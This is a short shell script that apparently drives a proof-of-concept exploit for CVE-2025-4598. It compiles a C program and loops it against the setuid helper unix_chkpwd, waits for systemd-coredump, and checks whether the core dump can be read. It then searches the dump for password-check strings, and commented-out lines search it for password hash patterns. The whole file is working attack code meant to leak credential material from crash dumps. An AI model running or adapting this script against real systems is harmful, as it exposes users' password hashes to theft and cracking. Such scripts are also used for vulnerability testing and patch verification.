#!/bin/sh

gcc CVE-2025-4598.c -o CVE-2025-4598 -Wall

ulimit -c unlimited

while :; do
    pid="$(printf 'whatever\0' | ./CVE-2025-4598 /usr/sbin/unix_chkpwd "$USER" nullok)"
    pidwait -f /usr/lib/systemd/systemd-coredump || sleep 0.1
    #echo $pid
    #ls -l /var/lib/systemd/coredump/
    file=/var/lib/systemd/coredump/core.unix_chkpwd.*.$pid.*
    getfacl $file || continue
    if coredumpctl -1 dump "$pid" 2>/dev/null | strings -a | grep 'password check failed'; then
    #if coredumpctl -1 dump "$pid" 2>/dev/null | strings -a | grep '\$[0-9A-Za-z]\+\$[0-9A-Za-z./]'; then
    #if zstdcat $file | strings -a | grep '\$[0-9A-Za-z]\+\$[0-9A-Za-z./]'; then
        break
    fi
done